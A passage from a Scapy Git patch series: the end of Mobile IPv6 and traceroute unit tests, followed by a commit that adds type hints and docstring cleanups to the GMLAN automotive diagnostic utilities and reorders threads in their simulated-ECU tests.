+a=IPv6(b'`\x00\x00\x00\x00\x18\x87@ \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02;\x02\x04w\x88\x99\xaa\xbb\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xaa\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc') +b = a.payload +a.nh == 135 and isinstance(b, MIP6MH_CoT) and b.nh==59 and b.mhtype == 4 and b.len== 2 and b.res == 0x77 and b.cksum == 0x8899 and b.index == 0xAABB and b.cookie == b'\xAA'*8 and b.token == b'\xCC'*8 + + +############ +############ ++ Binding Update Message + += MIP6MH_BU - build (default values) +s= b'`\x00\x00\x00\x00(<@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x87\x02\x01\x02\x00\x00\xc9\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00;\x01\x05\x00\xee`\x00\x00\xd0\x00\x00\x03\x01\x02\x00\x00' +raw(IPv6()/IPv6ExtHdrDestOpt(options=[HAO()])/MIP6MH_BU()) == s + += MIP6MH_BU - dissection (default values) +p = IPv6(s) +p[MIP6MH_BU].len == 1 + += MIP6MH_BU - build +s = b'`\x00\x00\x00\x00P<@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x87\x02\x01\x02\x00\x00\xc9\x10 \x01\r\xb8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xca\xfe;\x06\x05\x00\xea\xf2\x00\x00\xd0\x00\x00*\x01\x00\x03\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x02\x00\x00\x06\x12\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00' +raw(IPv6()/IPv6ExtHdrDestOpt(options=[HAO(hoa='2001:db8::cafe')])/MIP6MH_BU(mhtime=42, options=[MIP6OptAltCoA(),MIP6OptMobNetPrefix()])) == s + += MIP6MH_BU - dissection +p = IPv6(s) +p[MIP6MH_BU].cksum == 0xeaf2 and p[MIP6MH_BU].len == 6 and len(p[MIP6MH_BU].options) == 4 and p[MIP6MH_BU].mhtime == 42 + + +############ +############ ++ Binding ACK Message + += MIP6MH_BA - build +s = b'`\x00\x00\x00\x00\x10\x87@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01;\x01\x06\x00\xbc\xb9\x00\x80\x00\x00\x00*\x01\x02\x00\x00' +raw(IPv6()/MIP6MH_BA(mhtime=42)) == s + += MIP6MH_BA - dissection +p = IPv6(s) +p[MIP6MH_BA].cksum == 0xbcb9 and p[MIP6MH_BA].len == 1 and len(p[MIP6MH_BA].options) == 1 and p[MIP6MH_BA].mhtime == 42 + + +############ +############ ++ Binding ERR Message + += MIP6MH_BE - build +s = b'`\x00\x00\x00\x00\x18\x87@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01;\x02\x07\x00\xbbY\x02\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02' +raw(IPv6()/MIP6MH_BE(status=2, ha='1::2')) == s + += MIP6MH_BE - dissection +p = IPv6(s) +p[MIP6MH_BE].cksum=0xba10 and p[MIP6MH_BE].len == 1 and len(p[MIP6MH_BE].options) == 1 + + +############ +############ ++ TracerouteResult6 + += get_trace() +ip6_hlim = [("2001:db8::%d" % i, i) for i in six.moves.range(1, 12)] + +tr6_packets = [ (IPv6(dst="2001:db8::1", src="2001:db8::254", hlim=hlim)/UDP()/"scapy", + IPv6(dst="2001:db8::254", src=ip)/ICMPv6TimeExceeded()/IPerror6(dst="2001:db8::1", src="2001:db8::254", hlim=0)/UDPerror()/"scapy") + for (ip, hlim) in ip6_hlim ] + +tr6 = TracerouteResult6(tr6_packets) +tr6.get_trace() == {'2001:db8::1': {1: ('2001:db8::1', False), 2: ('2001:db8::2', False), 3: ('2001:db8::3', False), 4: ('2001:db8::4', False), 5: ('2001:db8::5', False), 6: ('2001:db8::6', False), 7: ('2001:db8::7', False), 8: ('2001:db8::8', False), 9: ('2001:db8::9', False), 10: ('2001:db8::10', False), 11: ('2001:db8::11', False)}} + += show() +def test_show(): + with ContextManagerCaptureOutput() as cmco: + tr6 = TracerouteResult6(tr6_packets) + tr6.show() + result = cmco.get_output() + expected = " 2001:db8::1 :udpdomain \n" + expected += "1 2001:db8::1 3 \n" + expected += "2 2001:db8::2 3 \n" + expected += "3 2001:db8::3 3 \n" + expected += "4 2001:db8::4 3 \n" + expected += "5 2001:db8::5 3 \n" + expected += "6 2001:db8::6 3 \n" + expected += "7 2001:db8::7 3 \n" + expected += "8 2001:db8::8 3 \n" + expected += "9 2001:db8::9 3 \n" + expected += "10 2001:db8::10 3 \n" + expected += "11 2001:db8::11 3 \n" + index_result = result.index("\n1") + index_expected = expected.index("\n1") + assert(result[index_result:] == expected[index_expected:]) + +test_show() + += graph() +saved_AS_resolver = conf.AS_resolver +conf.AS_resolver = None +tr6.make_graph() +assert len(tr6.graphdef) == 530 +assert tr6.graphdef.startswith("digraph trace {") +'"2001:db8::1 53/udp";' in tr6.graphdef +conf.AS_resolver = saved_AS_resolver From 711aa9f8252e9b41e8d033a7d566be95a884a3b7 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Wed, 18 Nov 2020 18:13:29 +0100 Subject: [PATCH 0403/1632] Cleanups and typing of gmlanutils (#2955) * Cleanups and typing of gmlanutils * add print statement to debug issue on travis * lets see if reordering the test calls influences this bug * Remove mypy casts & config Co-authored-by: gpotter2 --- .config/mypy/mypy.ini | 2 +- .config/mypy/mypy_enabled.txt | 1 + scapy/contrib/automotive/gm/gmlanutils.py | 222 ++++++++++++---------- test/configs/linux.utsc | 2 +- test/contrib/automotive/gm/gmlanutils.uts | 196 +++++++++---------- test/tools/isotpscanner.uts | 5 +- 6 files changed, 219 insertions(+), 209 deletions(-) diff --git a/.config/mypy/mypy.ini b/.config/mypy/mypy.ini index 690800fd51b..72e460f0de3 100644 --- a/.config/mypy/mypy.ini +++ b/.config/mypy/mypy.ini @@ -8,7 +8,7 @@ ignore_missing_imports = True # Layers specific config -[mypy-scapy.layers.*,mypy-scapy.contribs.*] +[mypy-scapy.layers.*,scapy.contrib.*] warn_return_any = False # External libraries that we ignore diff --git a/.config/mypy/mypy_enabled.txt b/.config/mypy/mypy_enabled.txt index cdcd23d135b..a2e756b1430 100644 --- a/.config/mypy/mypy_enabled.txt +++ b/.config/mypy/mypy_enabled.txt @@ -33,3 +33,4 @@ scapy/utils6.py #scapy/contrib/http2.py # needs to be fixed scapy/contrib/roce.py scapy/layers/can.py +scapy/contrib/automotive/gm/gmlanutils.py diff --git a/scapy/contrib/automotive/gm/gmlanutils.py b/scapy/contrib/automotive/gm/gmlanutils.py index af6b40f2470..36fce7cbf79 100644 --- a/scapy/contrib/automotive/gm/gmlanutils.py +++ b/scapy/contrib/automotive/gm/gmlanutils.py @@ -10,19 +10,23 @@ # scapy.contrib.status = loads import time + +from scapy.compat import Optional, cast, Callable + from scapy.contrib.automotive.gm.gmlan import GMLAN, GMLAN_SA, GMLAN_RD, \ GMLAN_TD, GMLAN_PM, GMLAN_RMBA from scapy.config import conf +from scapy.packet import Packet from scapy.contrib.isotp import ISOTPSocket from scapy.error import warning, log_loading from scapy.utils import PeriodicSenderThread - __all__ = ["GMLAN_TesterPresentSender", "GMLAN_InitDiagnostics", "GMLAN_GetSecurityAccess", "GMLAN_RequestDownload", "GMLAN_TransferData", "GMLAN_TransferPayload", "GMLAN_ReadMemoryByAddress", "GMLAN_BroadcastSocket"] + log_loading.info("\"conf.contribs['GMLAN']" "['treat-response-pending-as-answer']\" set to True). This " "is required by the GMLAN-Utils module to operate " @@ -33,52 +37,60 @@ conf.contribs['GMLAN'] = {'treat-response-pending-as-answer': False} -class GMLAN_TesterPresentSender(PeriodicSenderThread): - def __init__(self, sock, pkt=GMLAN(service="TesterPresent"), interval=2): - """ Thread to send TesterPresent messages packets periodically - - Args: - sock: socket where packet is sent periodically - pkt: packet to send - interval: interval between two packets - """ - PeriodicSenderThread.__init__(self, sock, pkt, interval) - - +# Helper function def _check_response(resp, verbose): + # type: (Packet, Optional[bool]) -> bool if resp is None: if verbose: print("Timeout.") return False if verbose: resp.show() - return resp.sprintf("%GMLAN.service%") != "NegativeResponse" + return resp.service != 0x7f # NegativeResponse -def _send_and_check_response(sock, req, timeout, verbose): - if verbose: - print("Sending %s" % repr(req)) - resp = sock.sr1(req, timeout=timeout, verbose=0) - return _check_response(resp, verbose) +class GMLAN_TesterPresentSender(PeriodicSenderThread): + def __init__(self, sock, pkt=GMLAN(service="TesterPresent"), interval=2): + # type: (ISOTPSocket, Packet, int) -> None + """ Thread to send GMLAN TesterPresent packets periodically -def GMLAN_InitDiagnostics(sock, broadcastsocket=None, timeout=None, - verbose=None, retry=0): - """Send messages to put an ECU into an diagnostic/programming state. - - Args: - sock: socket to send the message on. - broadcast: socket for broadcasting. If provided some message will be - sent as broadcast. Recommended when used on a network with - several ECUs. - timeout: timeout for sending, receiving or sniffing packages. - verbose: set verbosity level - retry: number of retries in case of failure. - - Returns true on success. + :param sock: socket where packet is sent periodically + :param pkt: packet to send + :param interval: interval between two packets + """ + PeriodicSenderThread.__init__(self, sock, pkt, interval) + + def run(self): + # type: () -> None + while not self._stopped.is_set(): + self._socket.sr1(self._pkt, verbose=False, timeout=0.1) + time.sleep(self._interval) + + +def GMLAN_InitDiagnostics(sock, broadcast_socket=None, timeout=None, verbose=None, retry=0): # noqa: E501 + # type: (ISOTPSocket, Optional[ISOTPSocket], Optional[int], Optional[bool], int) -> bool # noqa: E501 + """ Send messages to put an ECU into diagnostic/programming state. + + :param sock: socket for communication. + :param broadcast_socket: socket for broadcasting. If provided some message + will be sent as broadcast. Recommended when used + on a network with several ECUs. + :param timeout: timeout for sending, receiving or sniffing packages. + :param verbose: set verbosity level + :param retry: number of retries in case of failure. + :return: True on success else False """ + # Helper function + def _send_and_check_response(sock, req, timeout, verbose): + # type: (ISOTPSocket, Packet, Optional[int], Optional[bool]) -> bool + if verbose: + print("Sending %s" % repr(req)) + resp = sock.sr1(req, timeout=timeout, verbose=False) + return _check_response(resp, verbose) + if verbose is None: - verbose = conf.verb + verbose = conf.verb > 0 retry = abs(retry) while retry >= 0: @@ -86,13 +98,13 @@ def GMLAN_InitDiagnostics(sock, broadcastsocket=None, timeout=None, # DisableNormalCommunication p = GMLAN(service="DisableNormalCommunication") - if broadcastsocket is None: + if broadcast_socket is None: if not _send_and_check_response(sock, p, timeout, verbose): continue else: if verbose: print("Sending %s as broadcast" % repr(p)) - broadcastsocket.send(p) + broadcast_socket.send(p) time.sleep(0.05) # ReportProgrammedState @@ -116,24 +128,25 @@ def GMLAN_InitDiagnostics(sock, broadcastsocket=None, timeout=None, return False -def GMLAN_GetSecurityAccess(sock, keyFunction, level=1, timeout=None, - verbose=None, retry=0): - """Authenticate on ECU. Implements Seey-Key procedure. - - Args: - sock: socket to send the message on. - keyFunction: function implementing the key algorithm. - level: level of access - timeout: timeout for sending, receiving or sniffing packages. - verbose: set verbosity level - retry: number of retries in case of failure. +def GMLAN_GetSecurityAccess(sock, key_function, level=1, timeout=None, verbose=None, retry=0): # noqa: E501 + # type: (ISOTPSocket, Callable[[int], int], int, Optional[int], Optional[bool], int) -> bool # noqa: E501 + """ Authenticate on ECU. Implements Seey-Key procedure. - Returns true on success. + :param sock: socket to send the message on. + :param key_function: function implementing the key algorithm. + :param level: level of access + :param timeout: timeout for sending, receiving or sniffing packages. + :param verbose: set verbosity level + :param retry: number of retries in case of failure. + :return: True on success. """ if verbose is None: - verbose = conf.verb + verbose = conf.verb > 0 retry = abs(retry) + if key_function is None: + return False + if level % 2 == 0: warning("Parameter Error: Level must be an odd number.") return False @@ -157,7 +170,7 @@ def GMLAN_GetSecurityAccess(sock, keyFunction, level=1, timeout=None, return True keypkt = GMLAN() / GMLAN_SA(subfunction=level + 1, - securityKey=keyFunction(seed)) + securityKey=key_function(seed)) if verbose: print("Responding with key..") resp = sock.sr1(keypkt, timeout=timeout, verbose=0) @@ -182,21 +195,20 @@ def GMLAN_GetSecurityAccess(sock, keyFunction, level=1, timeout=None, def GMLAN_RequestDownload(sock, length, timeout=None, verbose=None, retry=0): - """Send RequestDownload message. + # type: (ISOTPSocket, int, Optional[int], Optional[bool], int) -> bool + """ Send RequestDownload message. - Usually used before calling TransferData. + Usually used before calling TransferData. - Args: - sock: socket to send the message on. - length: value for the message's parameter 'unCompressedMemorySize'. - timeout: timeout for sending, receiving or sniffing packages. - verbose: set verbosity level. - retry: number of retries in case of failure. - - Returns true on success. + :param sock: socket to send the message on. + :param length: value for the message's parameter 'unCompressedMemorySize'. + :param timeout: timeout for sending, receiving or sniffing packages. + :param verbose: set verbosity level. + :param retry: number of retries in case of failure. + :return: True on success """ if verbose is None: - verbose = conf.verb + verbose = conf.verb > 0 retry = abs(retry) while retry >= 0: @@ -211,26 +223,25 @@ def GMLAN_RequestDownload(sock, length, timeout=None, verbose=None, retry=0): return False -def GMLAN_TransferData(sock, addr, payload, maxmsglen=None, timeout=None, - verbose=None, retry=0): - """Send TransferData message. +def GMLAN_TransferData(sock, addr, payload, maxmsglen=None, timeout=None, verbose=None, retry=0): # noqa: E501 + # type: (ISOTPSocket, int, bytes, Optional[int], Optional[int], Optional[bool], int) -> bool # noqa: E501 + """ Send TransferData message. Usually used after calling RequestDownload. - Args: - sock: socket to send the message on. - addr: destination memory address on the ECU. - payload: data to be sent. - maxmsglen: maximum length of a single iso-tp message. (default: - maximum length) - timeout: timeout for sending, receiving or sniffing packages. - verbose: set verbosity level. - retry: number of retries in case of failure. - - Returns true on success. + :param sock: socket to send the message on. + :param addr: destination memory address on the ECU. + :param payload: data to be sent. + :param maxmsglen: maximum length of a single iso-tp message. + default: maximum length + :param timeout: timeout for sending, receiving or sniffing packages. + :param verbose: set verbosity level. + :param retry: number of retries in case of failure. + :return: True on success. """ if verbose is None: - verbose = conf.verb + verbose = conf.verb > 0 + retry = abs(retry) startretry = retry @@ -244,6 +255,8 @@ def GMLAN_TransferData(sock, addr, payload, maxmsglen=None, timeout=None, if maxmsglen is None or maxmsglen <= 0 or maxmsglen > (4093 - scheme): maxmsglen = (4093 - scheme) + maxmsglen = cast(int, maxmsglen) + for i in range(0, len(payload), maxmsglen): retry = startretry while True: @@ -268,19 +281,18 @@ def GMLAN_TransferData(sock, addr, payload, maxmsglen=None, timeout=None, def GMLAN_TransferPayload(sock, addr, payload, maxmsglen=None, timeout=None, verbose=None, retry=0): - """Send data by using GMLAN services. - - Args: - sock: socket to send the data on. - addr: destination memory address on the ECU. - payload: data to be sent. - maxmsglen: maximum length of a single iso-tp message. (default: - maximum length) - timeout: timeout for sending, receiving or sniffing packages. - verbose: set verbosity level. - retry: number of retries in case of failure. - - Returns true on success. + # type: (ISOTPSocket, int, bytes, Optional[int], Optional[int], Optional[bool], int) -> bool # noqa: E501 + """ Send data by using GMLAN services. + + :param sock: socket to send the data on. + :param addr: destination memory address on the ECU. + :param payload: data to be sent. + :param maxmsglen: maximum length of a single iso-tp message. + default: maximum length + :param timeout: timeout for sending, receiving or sniffing packages. + :param verbose: set verbosity level. + :param retry: number of retries in case of failure. + :return: True on success. """ if not GMLAN_RequestDownload(sock, len(payload), timeout=timeout, verbose=verbose, retry=retry): @@ -293,20 +305,19 @@ def GMLAN_TransferPayload(sock, addr, payload, maxmsglen=None, timeout=None, def GMLAN_ReadMemoryByAddress(sock, addr, length, timeout=None, verbose=None, retry=0): - """Read data from ECU memory. - - Args: - sock: socket to send the data on. - addr: source memory address on the ECU. - length: bytes to read - timeout: timeout for sending, receiving or sniffing packages. - verbose: set verbosity level. - retry: number of retries in case of failure. - - Returns the bytes read. + # type: (ISOTPSocket, int, int, Optional[int], Optional[bool], int) -> Optional[bytes] # noqa: E501 + """ Read data from ECU memory. + + :param sock: socket to send the data on. + :param addr: source memory address on the ECU. + :param length: bytes to read. + :param timeout: timeout for sending, receiving or sniffing packages. + :param verbose: set verbosity level. + :param retry: number of retries in case of failure. + :return: bytes red or None """ if verbose is None: - verbose = conf.verb + verbose = conf.verb > 0 retry = abs(retry) scheme = conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] @@ -335,6 +346,11 @@ def GMLAN_ReadMemoryByAddress(sock, addr, length, timeout=None, def GMLAN_BroadcastSocket(interface): - """Returns a GMLAN broadcast socket using interface.""" + # type: (str) -> ISOTPSocket + """ Returns a GMLAN broadcast socket using interface. + + :param interface: interface name + :return: ISOTPSocket configured as GMLAN Broadcast Socket + """ return ISOTPSocket(interface, sid=0x101, did=0x0, basecls=GMLAN, - extended_addr=0xfe) + extended_addr=0xfe, padding=True) diff --git a/test/configs/linux.utsc b/test/configs/linux.utsc index 741a8993ee9..4befd12ecb6 100644 --- a/test/configs/linux.utsc +++ b/test/configs/linux.utsc @@ -3,11 +3,11 @@ "test/*.uts", "test/scapy/layers/*.uts", "test/contrib/*.uts", + "test/tools/*.uts", "test/contrib/automotive/*.uts", "test/contrib/automotive/obd/*.uts", "test/contrib/automotive/gm/*.uts", "test/contrib/automotive/bmw/*.uts", - "test/tools/*.uts", "test/tls/tests_tls_netaccess.uts" ], "remove_testfiles": [ diff --git a/test/contrib/automotive/gm/gmlanutils.uts b/test/contrib/automotive/gm/gmlanutils.uts index 69bd96113a1..4b93405ef7b 100644 --- a/test/contrib/automotive/gm/gmlanutils.uts +++ b/test/contrib/automotive/gm/gmlanutils.uts @@ -148,10 +148,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True thread.join(timeout=5) @@ -166,9 +165,9 @@ def ecusim(): isotpsock2.send(nr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False thread.join(timeout=5) @@ -189,9 +188,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True thread.join(timeout=5) @@ -211,10 +210,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) starttime = time.time() # may be inaccurate -> on some systems only seconds precision result = GMLAN_RequestDownload(isotpsock, 4, timeout=repeats*tout+0.5) assert result @@ -234,9 +232,9 @@ def ecusim(): isotpsock2.send(nr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == False thread.join(timeout=5) @@ -250,9 +248,9 @@ def ecusim(): isotpsock2.send(pending) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=0.3) == False thread.join(timeout=5) @@ -271,9 +269,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True thread.join(timeout=5) @@ -292,9 +290,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=1) == True thread.join(timeout=5) @@ -323,9 +321,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_RequestDownload(isotpsock, 4, timeout=1, retry=1) == True assert ecusimSuccessfullyExecuted == True @@ -353,9 +351,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == True thread.join(timeout=5) @@ -379,9 +377,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x400000, payload, timeout=1) == True thread.join(timeout=5) @@ -405,9 +403,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan2, ISOTPSocket(isocan2, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=2) == True thread.join(timeout=5) @@ -427,9 +425,9 @@ def ecusim(): isotpsock2.send(nr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x40000000, payload, timeout=1) == False thread.join(timeout=5) @@ -464,9 +462,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1) == True thread.join(timeout=5) @@ -493,9 +491,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1, retry=1) == True thread.join(timeout=5) @@ -533,8 +531,9 @@ def ecusim(): thread = threading.Thread(target=ecusim) thread.name = "ECUSimulator" + thread.name -thread.start() + with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() sim_started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x40000000, payload*512, maxmsglen=0x1000000, timeout=8) == True @@ -553,9 +552,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 2**32 - 1, payload, timeout=1) == True thread.join(timeout=5) @@ -571,9 +570,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 2**32, payload, timeout=1) == False thread.join(timeout=5) @@ -589,9 +588,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, 0x00, payload, timeout=1) == True thread.join(timeout=5) @@ -607,9 +606,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferData(isotpsock, -1, payload, timeout=1) == False thread.join(timeout=5) @@ -640,9 +639,9 @@ def ecusim(): isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_TransferPayload(isotpsock, 0x40000000, payload, timeout=1) == True thread.join(timeout=5) @@ -680,10 +679,9 @@ def ecusim(): isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True thread.join(timeout=5) @@ -714,9 +712,9 @@ def ecusim(): isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=3, timeout=1) == True thread.join(timeout=5) @@ -748,9 +746,9 @@ def ecusim(): isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == False thread.join(timeout=5) @@ -770,9 +768,9 @@ def ecusim(): isotpsock2.send(seedmsg) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True thread.join(timeout=5) @@ -794,9 +792,9 @@ def ecusim(): isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True thread.join(timeout=5) @@ -819,9 +817,9 @@ def ecusim(): isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True thread.join(timeout=5) @@ -844,9 +842,9 @@ def ecusim(): isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True thread.join(timeout=5) @@ -887,32 +885,27 @@ def ecusim(): ecusimSuccessfullyExecuted = False thread = threading.Thread(target=ecusim) -thread.start() -started.wait(timeout=5) with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: + thread.start() + started.wait(timeout=5) assert GMLAN_InitDiagnostics(isotpsock, timeout=1, verbose=1) == True thread.join(timeout=5) assert ecusimSuccessfullyExecuted == True = sequence of the correct messages, disablenormalcommunication as broadcast -* TODO: This test errors if executed with ISOTPSoftSockets - -exit_if_no_isotp_module() ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True with new_can_socket0() as isocan, ISOTPSocket(isocan, 